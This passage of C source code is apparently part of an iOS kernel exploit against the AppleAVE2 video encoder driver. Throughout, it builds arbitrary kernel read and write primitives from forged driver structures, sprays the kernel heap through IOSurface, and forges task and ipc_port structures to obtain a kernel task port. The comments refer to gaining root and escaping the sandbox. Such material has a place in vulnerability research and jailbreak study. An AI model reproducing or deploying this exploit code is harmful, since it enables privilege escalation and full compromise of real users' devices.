Ready\n    \n    while(!*alert1){if(!_temp_kernel_reading_semaphore) return;}\n    *(uint64_t*)(inputmap_InitInfo + 5936) = precalc_value1;\n    \n    while(!*alert2){if(!_temp_kernel_reading_semaphore) return;}\n    //backup_iosurfacebuf = *alert2;\n    *alert2 = precalc_value2;\n    *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n    \n    while(!*alert3){if(!_temp_kernel_reading_semaphore) return;}\n    uint64_t verify_v = *alert3;\n    (printf)(\"verify_v: 0x%llx\\n\", verify_v);\n}\n\nuint32_t temp_kernel_reading_release_mem(uint64_t target_addr){\n    \n    uint32_t retdata = 0;\n    do{\n        *(uint64_t*)(inputmap_InitInfo + 56) = 0;\n        *(uint64_t*)(inputmap_InitInfo + 1096) = 0;\n        *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n        \n        *(uint64_t*)(inputmap_InitInfo + _temp_kernel_reading_mapOffset) = 0; // input_shit\n        \n        _temp_kernel_reading_target_addr = target_addr;\n        _temp_kernel_reading_semaphore = 0;\n        pthread_t ph = NULL;\n        pthread_create(&ph, NULL, (void*)_temp_kernel_reading_release_mem_threadFunc, NULL);\n        while(!_temp_kernel_reading_semaphore){};\n        \n        *(uint32_t*)(inputmap_InitInfo + 0x10) = 0x4569; // InfoType\n        *(uint32_t*)(inputmap_InitInfo + 12) = 0; // To cause AVE ERROR: multiPassEndPassCounterWFR *Can use for early return\n        // or cause unmap later in IMG_V_EncodeAndSendFrame\n        \n        *(uint32_t*)(inputmap_InitInfo + 96) = 1; // Skip code at: if ( *(_DWORD *)&clientbuf->inputmap_InitInfo_block1[96] != 1 )\n        *(uint8_t*)(inputmap_InitInfo + 13477) = 0; // disable kernel_debug\n        *(uint64_t*)(inputmap_InitInfo + 5936) = magic_addr + 0x30000 - 0x28; // point to a unused addr\n        {\n            char input_stru[0x28] = {0};\n            *(uint32_t*)(input_stru + 8) = 0;\n            *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId;\n            \n            size_t output_stru_size = 0x4;\n            uint32_t output_stru = 
0;\n            IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 6, input_stru, 0x28, &output_stru, &output_stru_size);\n        }\n        _temp_kernel_reading_semaphore = 0;\n        pthread_join(ph, NULL);\n        \n        \n        uint32_t *check_if_mem_been_released = (uint32_t*)(inputmap_InitInfo + _temp_kernel_reading_mapOffset + 24);\n        if(*check_if_mem_been_released == 0){\n            break;\n        }\n        \n    }while(1);\n    \n    return retdata;\n}\n\nvoid prep_new_reading_primi(){\n    // Have to call this everytime in prior to read\n    \n    char *forge_clientbuf = inputmap_InitInfo + 0x24000;\n    uint64_t forge_clientbuf_kaddr = magic_addr + 0x24000;\n    \n    char *forge_KernelFrameQueue = forge_clientbuf + 0x29B98;\n    uint64_t forge_KernelFrameQueue_kaddr = forge_clientbuf_kaddr + 0x29B98;\n    \n    char *forge_inputmap_FrameInfo = forge_KernelFrameQueue + 24;\n    uint64_t forge_inputmap_FrameInfo_kaddr = forge_KernelFrameQueue_kaddr + 24;\n    \n    *(uint64_t*)(forge_KernelFrameQueue + 0x10) = forge_inputmap_FrameInfo_kaddr;\n    \n    *(uint32_t*)(forge_clientbuf + 0x8) = 0x0;\n    *(forge_clientbuf + 0x27B59) = 0x0;\n    \n \n    *(uint64_t*)(forge_inputmap_FrameInfo + 16) = 0x4569;\n    *(uint32_t*)(forge_clientbuf + 0x4FF0 + 112) = 0x1;\n    \n    *(uint64_t*)(forge_clientbuf + 0x27838) = forge_inputmap_FrameInfo_kaddr + 0x2A000;\n    \n    *(uint64_t*)(forge_inputmap_FrameInfo + 5936) = 0;\n}\n\nuint32_t new_reading_primitive(uint64_t target_addr){\n    \n    prep_new_reading_primi();\n    \n    char *forge_inputmap_FrameInfo = inputmap_InitInfo + 0x24000 + 0x29B98 + 24;\n    uint64_t forge_inputmap_FrameInfo_kaddr = magic_addr + 0x24000 + 0x29B98 + 24;\n    \n    *(uint32_t*)(forge_inputmap_FrameInfo + 20) = 0x2;\n    \n    uint32_t *retdata = (uint32_t*)(forge_inputmap_FrameInfo + 176);\n    *retdata = 0;\n    \n    char *m_DPB = forge_inputmap_FrameInfo + 0x2A000;\n    uint64_t m_DPB_inKernel = 
forge_inputmap_FrameInfo_kaddr + 0x2A000;\n    \n    *(uint32_t*)(m_DPB + 20) = 1;\n    *(uint32_t*)(m_DPB + 2364) = 0;\n    \n    char *v8 = m_DPB + 96*(0) + 728;\n    uint64_t v8_inKernel = m_DPB_inKernel + 96*(0) + 728;\n    \n    *(uint64_t*)(v8 + 72) = v8_inKernel + 40;\n    *(uint64_t*)(v8 + 80) = 0;\n    *(uint64_t*)(v8 + 40) = v8_inKernel + 48 - 32;\n    *(uint64_t*)(v8 + 48) = target_addr - 12;\n    \n    *(uint64_t*)(v8) = 0;\n    \n    *(uint32_t*)(forge_inputmap_FrameInfo + 0x10) = 0x4569;\n    *(uint32_t*)(forge_inputmap_FrameInfo + 12) = 0;\n    \n    *(uint32_t*)(forge_inputmap_FrameInfo + 96) = 2;\n    *(uint8_t*)(forge_inputmap_FrameInfo + 13477) = 0;\n    *(uint64_t*)(forge_inputmap_FrameInfo + 5936) = 0;\n    {\n        char input_stru[0x28] = {0};\n        *(uint32_t*)(input_stru + 8) = 0;\n        *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId;\n        \n        size_t output_stru_size = 0x4;\n        uint32_t output_stru = 0;\n        IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 6, input_stru, 0x28, &output_stru, &output_stru_size);\n    }\n    \n    return *retdata;\n}\n\nvoid new_writing_primi(uint64_t target_addr, uint32_t write_data){\n    \n    char *forge_clientbuf = inputmap_InitInfo + 0x24000; // 放在 magic mem + 0x24000的位置\n    \n    char *forge_KernelFrameQueue = forge_clientbuf + 0x29B98;\n    \n    //KernelFrameQueue->m_BaseAddress; // in this write prim, m_BaseAddress is the target addr we want it to be overwritten\n    *(uint64_t*)(forge_KernelFrameQueue + 0x10) = target_addr - 5948;\n    \n    // clientbuf->UniqueClientID // in this write prim, UniqueClientID is the data we will use it to overwrite\n    *(uint32_t*)(forge_clientbuf + 0x8) = write_data;\n    \n    {\n        char *input_stru = calloc(1, 0x28);\n        *(uint32_t*)(input_stru + 8) = 0; // offset of inputmap_FrameInfo, godamn, cool feature\n        *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId;\n        \n        size_t output_stru_size = 0x4;\n   
     char *output_stru = calloc(1, output_stru_size);\n        IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 6, input_stru, 0x28, output_stru, &output_stru_size);\n    }\n}\n\nvoid build_fake_task_stru_forReadMem(char *faketask, uint64_t target_addr){\n    \n    *(uint32_t*)(faketask + 0x10) = 99; // ref_cnt\n    \n    // offset 0x368: mach task->bsd_info\n    \n    *(uint64_t*)(faketask + 0x368) = target_addr - 0x60;\n}\n\nvoid build_fake_ipc_port_stru(struct ipc_port *fakeport, uint64_t specify_kobject){\n    \n    struct ipc_port *_tmp = malloc(sizeof(struct ipc_port));\n    bzero(_tmp, sizeof(struct ipc_port));\n    \n    _tmp->ip_bits = IO_BITS_ACTIVE | IKOT_TASK | IO_BITS_KOBJECT;\n    _tmp->ip_references = 100;\n    _tmp->ip_lock.type = 0x11;\n    _tmp->ip_messages.port.receiver_name = 1;\n    _tmp->ip_messages.port.msgcount = 0;\n    _tmp->ip_messages.port.qlimit = MACH_PORT_QLIMIT_KERNEL;\n    \n    _tmp->ip_kobject = specify_kobject;\n    _tmp->ip_receiver = ipc_space_kernel_kAddr;\n    \n    KernelWrite_anySize(fakeport, _tmp, sizeof(struct ipc_port));\n    \n}\n\nvoid build_fake_task_stru_forTFP0(struct task *faketask){\n    \n    //KernelRead_anySize(p_ucred_obtain_rootAndUnsandbox, old_cred, 0x68);\n    struct task *_tmp = malloc(sizeof(struct task));\n    bzero(_tmp, sizeof(struct task));\n    \n    _tmp->ref_count = 99;\n    _tmp->lock.data = 0x0;\n    _tmp->lock.type = 0x22;\n    _tmp->active = 1;\n    _tmp->pad2 = 1; // Something intro since iOS13, must not be 0, same offsets on iPhoneX and XS\n    _tmp->map = kernel_map_kAddr;\n    \n    KernelWrite_anySize(faketask, _tmp, sizeof(struct task));\n}\n\nsize_t TT1_seria_data_totalLen = 0;\nuint32_t *TT1_seria_data_head = NULL;\nuint64_t *TT1_spraydata = NULL;\nuint32_t *TT1_seria_data_tail = NULL;\n\n#define TT1_holes_count 20\n\nvoid Init_spraydata_for_TT1(uint32_t spray_id){\n    // kalloc.48\n    size_t spray_entity_size = TT1_holes_count * 112;\n    TT1_seria_data_totalLen = 
spray_entity_size + 20 + 8; // 20/8 is head/tail for seriadata format\n    TT1_seria_data_head = calloc(1, TT1_seria_data_totalLen);\n    TT1_spraydata = (uint64_t *)(((char*)TT1_seria_data_head) + 20);\n    TT1_seria_data_tail = (uint32_t *)(((char*)TT1_seria_data_head) + spray_entity_size + 20);\n    \n    memset(TT1_spraydata, 0x77, spray_entity_size);\n    \n    TT1_seria_data_head[0] = spray_id;\n    TT1_seria_data_head[1] = 0;\n    TT1_seria_data_head[2] = kOSSerializeMagic;\n    TT1_seria_data_head[3] = kOSSerializeEndCollection | kOSSerializeArray | 2;\n    TT1_seria_data_head[4] = kOSSerializeData | (uint32_t)spray_entity_size;\n    \n    TT1_seria_data_tail[0] = kOSSerializeEndCollection | kOSSerializeString | 2;\n    TT1_seria_data_tail[1] = 0x1;\n}\n\nuint32_t TT1_sprayid = 0xB201;\nvoid TT1_send_spray(){\n    \n    size_t output_stru_size = 4;\n    uint32_t output_stru = 0;\n    \n    TT1_sprayid = TT1_sprayid + 1;\n    \n    // Start spraying\n    for(int i=TT1_sprayid; i<(TT1_sprayid+1); i++){\n        TT1_seria_data_tail[1] = i;\n        if(!check_num_stringlizability_4bytes(i)) // Make sure key is valid\n            continue;\n        \n        // IOSurfaceRootUserClient_sSetValue\n        IOConnectCallStructMethod(IOSurfaceRootUserClient_ioconn, 9, TT1_seria_data_head, TT1_seria_data_totalLen, &output_stru, &output_stru_size);\n    }\n}\n\nsize_t TT2_seria_data_totalLen = 0;\nuint32_t *TT2_seria_data_head = NULL;\nchar *TT2_spraydata = NULL;\nuint32_t *TT2_seria_data_tail = NULL;\n\nvoid Init_spraydata_for_TT2(uint32_t spray_id){\n    // kalloc.48\n    size_t spray_entity_size = 112;\n    TT2_seria_data_totalLen = spray_entity_size + 20 + 8; // 20/8 is head/tail for seriadata format\n    TT2_seria_data_head = calloc(1, TT2_seria_data_totalLen);\n    TT2_spraydata = (((char*)TT2_seria_data_head) + 20);\n    TT2_seria_data_tail = (uint32_t *)(((char*)TT2_seria_data_head) + spray_entity_size + 20);\n    \n    memset(TT2_spraydata, 0x66, 
spray_entity_size);\n    \n    TT2_seria_data_head[0] = spray_id;\n    TT2_seria_data_head[1] = 0;\n    TT2_seria_data_head[2] = kOSSerializeMagic;\n    TT2_seria_data_head[3] = kOSSerializeEndCollection | kOSSerializeArray | 2;\n    TT2_seria_data_head[4] = kOSSerializeData | (uint32_t)spray_entity_size;\n    \n    TT2_seria_data_tail[0] = kOSSerializeEndCollection | kOSSerializeString | 2;\n    TT2_seria_data_tail[1] = 0x1;\n}\n\nvoid TT2_send_spray(){\n    \n    size_t output_stru_size = 4;\n    uint32_t output_stru = 0;\n    \n    // Start spraying\n    for(int i=0xD205; i<0xDC00; i++){\n        *(uint32_t*)(TT2_spraydata + 0x18) = i;\n        TT2_seria_data_tail[1] = i;\n        if(!check_num_stringlizability_4bytes(i)) // Make sure key is valid\n            continue;\n        \n        // IOSurfaceRootUserClient_sSetValue\n        IOConnectCallStructMethod(IOSurfaceRootUserClient_ioconn, 9, TT2_seria_data_head, TT2_seria_data_totalLen, &output_stru, &output_stru_size);\n    }\n}\n\nvoid TT2_send_spray_smallspray(){\n    \n    size_t output_stru_size = 4;\n    uint32_t output_stru = 0;\n    \n    // Start spraying\n    for(int i=0xDC01; i<0xDD00; i++){\n        *(uint32_t*)(TT2_spraydata + 0x18) = i;\n        TT2_seria_data_tail[1] = i;\n        if(!check_num_stringlizability_4bytes(i)) // Make sure key is valid\n            continue;\n        \n        // IOSurfaceRootUserClient_sSetValue\n        IOConnectCallStructMethod(IOSurfaceRootUserClient_ioconn, 9, TT2_seria_data_head, TT2_seria_data_totalLen, &output_stru, &output_stru_size);\n    }\n}\n\nvoid TT2_release_all(){\n    \n    for(int i=0xD205; i<0xDD00; i++){\n        if(!check_num_stringlizability_4bytes(i)) // Make sure key is valid\n            continue;\n        \n        IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, i);\n    }\n}\n\nuint8_t add_new_client(){\n    size_t input_stru_size = 0x8;\n    uint64_t input_stru = 0;\n    size_t output_stru_size = 0x8;\n    uint32_t output_stru[2] 
= {0}; // Contain clientbuf->UniqueClientID\n    int kr = IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 0, &input_stru, input_stru_size, output_stru, &output_stru_size);\n    // For: AVE ERROR: FindUserClientInfo EnqueueGated failed\n    printf(\"  AVE AddClient kr: 0x%x(%d) clientid:0x%x|0x%x\\n\", kr, kr, output_stru[0], output_stru[1]);\n    if(kr){\n        printf(\"client full\\n\");\n        return 1;\n    }\n    return 0;\n}\n\nvoid remove_client(){\n    size_t input_stru_size = 0x4;\n    uint32_t unused1 = 0;\n    size_t output_stru_size = 0x4;\n    uint32_t unused2 = 0;\n    IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 1, &unused1, input_stru_size, &unused2, &output_stru_size);\n    // Neither output_stru or kr has used for indicates any sign of success or failure\n}\n\nvoid encode_client_normal(uint8_t isFor_finalCleaning){\n    \n    *(uint32_t*)(inputmap_InitInfo + 13344) = 1;\n    *(uint32_t*)(inputmap_InitInfo + 13368) = 1;\n    *(uint32_t*)(inputmap_InitInfo + 2020) = 160;\n    *(uint32_t*)(inputmap_InitInfo + 2024) = 64;\n    *(uint32_t*)(inputmap_InitInfo + 2028) = 1;\n    \n    *(uint32_t*)(inputmap_InitInfo + 0x10) = 0x4569;\n    *(uint32_t*)(inputmap_InitInfo + 12) = 5;\n    *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n    \n    *(uint8_t*)(inputmap_InitInfo + 13288) = 1;\n    \n    *(uint8_t*)(inputmap_InitInfo + 13377) = 0;\n    if(isFor_finalCleaning)\n        *(uint32_t*)(inputmap_InitInfo + 4) = 0;\n    else\n        *(uint32_t*)(inputmap_InitInfo + 4) = 0x333;\n    \n    *(uint32_t*)(inputmap_InitInfo + 96) = 2;\n    \n    {\n        char *input_stru = calloc(1, 0x110);\n        *(uint32_t*)(input_stru + 8) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId;\n        \n        *(uint64_t*)(input_stru + 16) = InitInfo_surfaceId;\n        \n        *(uint64_t*)(input_stru + 24) = InitInfo_surfaceId;\n        \n        *(uint64_t*)(input_stru + 28) = InitInfo_surfaceId;\n        
*(uint64_t*)(input_stru + 32) = InitInfo_surfaceId;\n        *(uint64_t*)(input_stru + 36) = InitInfo_surfaceId;\n        *(uint64_t*)(input_stru + 40) = InitInfo_surfaceId;\n        *(uint64_t*)(input_stru + 44) = InitInfo_surfaceId;\n        \n        *(uint32_t*)(input_stru + 184) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 188) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 192) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 196) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 200) = InitInfo_surfaceId;\n        \n        *(uint32_t*)(input_stru + 204) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 208) = InitInfo_surfaceId;\n        \n        *(uint32_t*)(input_stru + 212) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 216) = InitInfo_surfaceId;\n        \n        size_t output_stru_size = 0x4;\n        char *output_stru = calloc(1, output_stru_size);\n        IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 7, input_stru, 0x110, output_stru, &output_stru_size);\n    }\n}\n\n\nvoid encode_client_normal222(){\n    \n    *(uint32_t*)(inputmap_InitInfo + 13344) = 1;\n    *(uint32_t*)(inputmap_InitInfo + 13368) = 1;\n    *(uint32_t*)(inputmap_InitInfo + 2020) = 160;\n    *(uint32_t*)(inputmap_InitInfo + 2024) = 64;\n    *(uint32_t*)(inputmap_InitInfo + 2028) = 1;\n    \n    *(uint32_t*)(inputmap_InitInfo + 0x10) = 0x4569;\n    *(uint32_t*)(inputmap_InitInfo + 12) = 5;\n    *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n    \n    *(uint8_t*)(inputmap_InitInfo + 13288) = 1;\n    \n    *(uint8_t*)(inputmap_InitInfo + 13377) = 0;\n    *(uint32_t*)(inputmap_InitInfo + 4) = 0;\n    \n    *(uint32_t*)(inputmap_InitInfo + 96) = 2;\n    \n    {\n        char *input_stru = calloc(1, 0x110);\n        *(uint32_t*)(input_stru + 8) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId;\n        \n        *(uint64_t*)(input_stru + 16) = InitInfo_surfaceId;\n        \n        
*(uint64_t*)(input_stru + 24) = InitInfo_surfaceId;\n        \n        *(uint64_t*)(input_stru + 28) = InitInfo_surfaceId;\n        *(uint64_t*)(input_stru + 32) = InitInfo_surfaceId;\n        *(uint64_t*)(input_stru + 36) = InitInfo_surfaceId;\n        *(uint64_t*)(input_stru + 40) = InitInfo_surfaceId;\n        *(uint64_t*)(input_stru + 44) = InitInfo_surfaceId;\n        \n        *(uint32_t*)(input_stru + 184) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 188) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 192) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 196) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 200) = InitInfo_surfaceId;\n        \n        *(uint32_t*)(input_stru + 204) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 208) = InitInfo_surfaceId;\n        \n        *(uint32_t*)(input_stru + 212) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 216) = InitInfo_surfaceId;\n        \n        size_t output_stru_size = 0x4;\n        char *output_stru = calloc(1, output_stru_size);\n        \n        IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 7, input_stru, 0x110, output_stru, &output_stru_size);\n    }\n}\n\nvoid spray_client(){\n    \n    *(uint64_t*)(inputmap_InitInfo + 1072) = 0;\n    \n    pthread_t p3 = NULL;\n    pthread_create(&p3, &pth_commAttr, (void*)race_kmem2, NULL);\n    \n    *(uint32_t*)(inputmap_InitInfo + 13344) = 1;\n    *(uint32_t*)(inputmap_InitInfo + 13368) = 1;\n    \n    *(uint32_t*)(inputmap_InitInfo + 2020) = 0xB0F0-31;\n    *(uint32_t*)(inputmap_InitInfo + 2024) = 0x990-31;\n    *(uint32_t*)(inputmap_InitInfo + 4) = 1;\n    \n    *(uint32_t*)(inputmap_InitInfo + 0x10) = 0x4567;\n    *(uint32_t*)(inputmap_InitInfo + 12) = 0;\n    \n    *(uint8_t*)(inputmap_InitInfo + 13288) = 1;\n    *(uint32_t*)(inputmap_InitInfo + 96) = 39;\n    *(uint32_t*)(inputmap_InitInfo + 1936) = 1;\n    \n    *(uint32_t*)(inputmap_InitInfo + 13292) = 1;\n    *(uint32_t*)(inputmap_InitInfo 
+ 2028) = 1;\n    *(uint32_t*)(inputmap_InitInfo + 13388) = 5;\n    \n    char input_stru[0x110] = {0};\n    *(uint32_t*)(input_stru + 8) = InitInfo_surfaceId; // FrameQueue\n    *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId; // InitInfo\n    \n    *(uint64_t*)(input_stru + 16) = InitInfo_surfaceId; // ParameterSetsBuffer\n    \n    *(uint64_t*)(input_stru + 24) = InitInfo_surfaceId; // mbComplexityMapBuffer\n    \n    *(uint64_t*)(input_stru + 28) = InitInfo_surfaceId; // statsMapBuffer[0]\n    *(uint64_t*)(input_stru + 32) = InitInfo_surfaceId; // statsMapBuffer[1]\n    *(uint64_t*)(input_stru + 36) = InitInfo_surfaceId; // statsMapBuffer[2]\n    *(uint64_t*)(input_stru + 40) = InitInfo_surfaceId; // statsMapBuffer[3]\n    *(uint64_t*)(input_stru + 44) = InitInfo_surfaceId; // statsMapBuffer[4]\n    \n    *(uint32_t*)(input_stru + 184) = InitInfo_surfaceId; // codedOutputBuffer[0]\n    *(uint32_t*)(input_stru + 188) = InitInfo_surfaceId; // codedOutputBuffer[1]\n    *(uint32_t*)(input_stru + 192) = InitInfo_surfaceId; // codedOutputBuffer[2]\n    *(uint32_t*)(input_stru + 196) = InitInfo_surfaceId; // codedOutputBuffer[3]\n    *(uint32_t*)(input_stru + 200) = InitInfo_surfaceId; // codedOutputBuffer[4]\n    \n    *(uint32_t*)(input_stru + 204) = InitInfo_surfaceId; // xCodeOutputBuffer[0]\n    *(uint32_t*)(input_stru + 208) = InitInfo_surfaceId; // xCodeOutputBuffer[1]\n    \n    *(uint32_t*)(input_stru + 212) = InitInfo_surfaceId; // codedHeaderBuffer [0] *Must Specify\n    *(uint32_t*)(input_stru + 216) = InitInfo_surfaceId; // codedHeaderBuffer [1] *Must Specify\n    *(uint32_t*)(input_stru + 220) = InitInfo_surfaceId; // codedHeaderBuffer [2]\n    *(uint32_t*)(input_stru + 224) = InitInfo_surfaceId; // codedHeaderBuffer [3]\n    *(uint32_t*)(input_stru + 228) = InitInfo_surfaceId; // codedHeaderBuffer [4]\n    \n    *(uint32_t*)(input_stru + 232) = InitInfo_surfaceId; // sliceHeaderBuffer[0]\n    *(uint32_t*)(input_stru + 236) = InitInfo_surfaceId; // 
sliceHeaderBuffer[1]\n    *(uint32_t*)(input_stru + 240) = InitInfo_surfaceId; // sliceHeaderBuffer[2]\n    *(uint32_t*)(input_stru + 244) = InitInfo_surfaceId; // sliceHeaderBuffer[3]\n    *(uint32_t*)(input_stru + 248) = InitInfo_surfaceId; // sliceHeaderBuffer[4]\n    \n    *(uint32_t*)(input_stru + 48) = InitInfo_surfaceId; // userDPBBuffer[0][0] ioSurface\n    *(uint32_t*)(input_stru + 52) = InitInfo_surfaceId; // userDPBBuffer[0][1] ioSurface\n    *(uint32_t*)(input_stru + 56) = InitInfo_surfaceId; // userDPBBuffer[1][0] ioSurface\n    *(uint32_t*)(input_stru + 60) = InitInfo_surfaceId; // userDPBBuffer[1][1] ioSurface\n    *(uint32_t*)(input_stru + 64) = InitInfo_surfaceId; // userDPBBuffer[2][0] ioSurface\n    *(uint32_t*)(input_stru + 68) = InitInfo_surfaceId; // userDPBBuffer[2][1] ioSurface\n    *(uint32_t*)(input_stru + 72) = InitInfo_surfaceId; // userDPBBuffer[3][0] ioSurface\n    *(uint32_t*)(input_stru + 76) = InitInfo_surfaceId; // userDPBBuffer[3][1] ioSurface\n    *(uint32_t*)(input_stru + 80) = InitInfo_surfaceId; // userDPBBuffer[4][0] ioSurface\n    *(uint32_t*)(input_stru + 84) = InitInfo_surfaceId; // userDPBBuffer[4][1] ioSurface\n    *(uint32_t*)(input_stru + 88) = InitInfo_surfaceId; // userDPBBuffer[5][0] ioSurface\n    *(uint32_t*)(input_stru + 92) = InitInfo_surfaceId; // userDPBBuffer[5][1] ioSurface\n    *(uint32_t*)(input_stru + 96) = InitInfo_surfaceId; // userDPBBuffer[6][0] ioSurface\n    *(uint32_t*)(input_stru + 100) = InitInfo_surfaceId; // userDPBBuffer[6][1] ioSurface\n    *(uint32_t*)(input_stru + 104) = InitInfo_surfaceId; // userDPBBuffer[7][0] ioSurface\n    *(uint32_t*)(input_stru + 108) = InitInfo_surfaceId; // userDPBBuffer[7][1] ioSurface\n    *(uint32_t*)(input_stru + 112) = InitInfo_surfaceId; // userDPBBuffer[8][0] ioSurface\n    *(uint32_t*)(input_stru + 116) = InitInfo_surfaceId; // userDPBBuffer[8][1] ioSurface\n    *(uint32_t*)(input_stru + 120) = InitInfo_surfaceId; // userDPBBuffer[9][0] ioSurface\n    
*(uint32_t*)(input_stru + 124) = InitInfo_surfaceId; // userDPBBuffer[9][1] ioSurface\n    *(uint32_t*)(input_stru + 128) = InitInfo_surfaceId; // userDPBBuffer[10][0] ioSurface\n    *(uint32_t*)(input_stru + 132) = InitInfo_surfaceId; // userDPBBuffer[10][1] ioSurface\n    *(uint32_t*)(input_stru + 136) = InitInfo_surfaceId; // userDPBBuffer[11][0] ioSurface\n    *(uint32_t*)(input_stru + 140) = InitInfo_surfaceId; // userDPBBuffer[11][1] ioSurface\n    *(uint32_t*)(input_stru + 144) = InitInfo_surfaceId; // userDPBBuffer[12][0] ioSurface\n    *(uint32_t*)(input_stru + 148) = InitInfo_surfaceId; // userDPBBuffer[12][1] ioSurface\n    *(uint32_t*)(input_stru + 152) = InitInfo_surfaceId; // userDPBBuffer[13][0] ioSurface\n    *(uint32_t*)(input_stru + 156) = InitInfo_surfaceId; // userDPBBuffer[13][1] ioSurface\n    *(uint32_t*)(input_stru + 160) = InitInfo_surfaceId; // userDPBBuffer[14][0] ioSurface\n    *(uint32_t*)(input_stru + 164) = InitInfo_surfaceId; // userDPBBuffer[14][1] ioSurface\n    *(uint32_t*)(input_stru + 168) = InitInfo_surfaceId; // userDPBBuffer[15][0] ioSurface\n    *(uint32_t*)(input_stru + 172) = InitInfo_surfaceId; // userDPBBuffer[15][1] ioSurface\n    *(uint32_t*)(input_stru + 176) = InitInfo_surfaceId; // userDPBBuffer[16][0] ioSurface\n    *(uint32_t*)(input_stru + 180) = InitInfo_surfaceId; // userDPBBuffer[16][1] ioSurface\n    \n    *(uint8_t*)(input_stru + 256) = 1;\n    *(uint64_t*)(input_stru + 264) = 0x2222222222222222;\n    \n    size_t output_stru_size = 4;\n    char output_stru[4] = {0};\n    \n    IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 7, input_stru, 0x110, output_stru, &output_stru_size);\n}\n\nuint8_t check_if_valid_kernel_ptr(uint64_t target_ptr){\n    if(((target_ptr >> 32) & 0xFFFFFFF0) == 0xFFFFFFF0)\n        return 1;\n    return 0;\n}\n\nuint64_t find_proc_byPID(pid_t target_pid) {\n    \n    uint64_t found_proc = KernelRead_8bytes(HARDCODED_allproc + kaslr);\n    while(1){\n        // this loop start 
from the most recent new proc\n        if(!found_proc)\n            break;\n        \n        pid_t pid_i = KernelRead_4bytes(found_proc + OFFSET_bsd_info_pid);\n        \n        if(target_pid == pid_i)\n            break;\n        \n        found_proc = KernelRead_8bytes(found_proc);\n    }\n    return found_proc;\n}\n\n#define PROC_ALL_PIDS        1\nextern int proc_listpids(uint32_t type, uint32_t typeinfo, void *buffer, int buffersize);\nextern int proc_pidpath(int pid, void * buffer, uint32_t  buffersize);\n\npid_t look_for_proc(char *proc_name){\n    \n    pid_t *pids = calloc(1, 3000 * sizeof(pid_t));\n    int procs_cnt = proc_listpids(PROC_ALL_PIDS, 0, pids, 3000);\n    if(procs_cnt > 3000){\n        pids = realloc(pids, procs_cnt * sizeof(pid_t));\n        procs_cnt = proc_listpids(PROC_ALL_PIDS, 0, pids, procs_cnt);\n    }\n    char pathBuffer[4096];\n    for (int i=(procs_cnt-1); i>=0; i--) {\n        if(pids[i] == 0){continue;}\n        \n        bzero(pathBuffer, 4096);\n        if(proc_pidpath(pids[i], pathBuffer, sizeof(pathBuffer))){\n            //printf(\"  pid(%d): %s\\n\", pids[i], pathBuffer);\n            if(!strcmp(proc_name, pathBuffer)){\n                free(pids);\n                return pids[i];\n            }\n        }\n    }\n    free(pids);\n    return 0;\n}\n\nchar *string_get_basename(const char *str) {\n    char *base = strrchr(str, '/');\n    return base ? 
base+1 : str;\n}\n\npid_t look_for_proc_basename(char *proc_name){\n    pid_t *pids = calloc(1, 3000 * sizeof(pid_t));\n    int procs_cnt = proc_listpids(PROC_ALL_PIDS, 0, pids, 3000);\n    if(procs_cnt > 3000){\n        pids = realloc(pids, procs_cnt * sizeof(pid_t));\n        procs_cnt = proc_listpids(PROC_ALL_PIDS, 0, pids, procs_cnt);\n    }\n    char pathBuffer[4096];\n    for (int i=(procs_cnt-1); i>=0; i--) {\n        if(pids[i] == 0){continue;}\n        bzero(pathBuffer, 4096);\n        if(proc_pidpath(pids[i], pathBuffer, sizeof(pathBuffer))){\n            \n            extern char *string_get_basename(const char *str);\n            char *ww = string_get_basename(pathBuffer);\n            \n            if(!strcmp(proc_name, ww)){\n                free(pids);\n                return pids[i];\n            }\n        }\n    }\n    free(pids);\n    return 0;\n}\n\nstruct paveway_sprayAddrs_pack{\n    uint64_t *paveway_sprayAddrs;\n    uint32_t paveway_sprayCnt;\n};\nstruct paveway_sprayAddrs_pack *_pack_paveway = 0;\nuint32_t _pack_pavewayCnt = 0;\n\nuint64_t hohoo(){\n    // LGB at Texas Instrument!\n    uint64_t conti_seqno[2] = {0};\n    uint64_t *paveway_sprayAddrs = calloc(1, 300 * 8); // 300 is default storage unit count of paveway_sprayAddrs\n    uint32_t paveway_sprayCnt = 0;\n    while(1){\n        uint64_t new_addr = alloc_kernel_40_mem();\n        paveway_sprayAddrs[paveway_sprayCnt] = new_addr;\n        paveway_sprayCnt ++;\n        \n        for(int j=0; j<paveway_sprayCnt; j++){\n            uint64_t stored_addr = paveway_sprayAddrs[j];\n            if((new_addr + 0x30) == stored_addr){\n                // If mem right after new_addr is known previously sprayed\n                \n                if(!conti_seqno[0]){\n                    conti_seqno[0] = new_addr;\n                } else if(!conti_seqno[1]){\n                    if((conti_seqno[0] != stored_addr) && (conti_seqno[0] != (new_addr - 0x30))){\n                        // Avoid store an 
